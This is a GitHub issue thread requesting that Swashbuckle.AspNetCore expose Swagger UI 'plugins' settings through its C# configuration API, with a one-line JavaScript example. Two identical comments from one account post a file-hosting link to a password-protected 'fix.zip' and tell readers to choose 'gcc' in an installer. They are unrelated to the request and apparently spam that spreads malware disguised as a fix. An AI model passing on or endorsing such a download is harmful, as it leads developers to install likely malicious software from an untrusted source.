### ISSUE TITLE
[Feature request]: Expose `plugins` settings in swagger ui config API

### ISSUE THREAD

**Issue by jvmlet** [domaindrivendev/Swashbuckle.AspNetCore#3049]
### Is your feature request related to a specific problem? Or an existing feature?

Please expose `plugins` settings in swagger ui configObject and render them in `index.js` similar to js `requestInterceptor` /`responseInterceptor`.

### Describe the solution you'd like

I want to be able to configure swagger ui with custom plugins (via c# API of `ConfigObject` or `SwaggerUIOptions`).
When rendered, the js code should look like 
````js
configObject.plugins=[myCustomPlugin1,myCustomPlugin2];
````

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
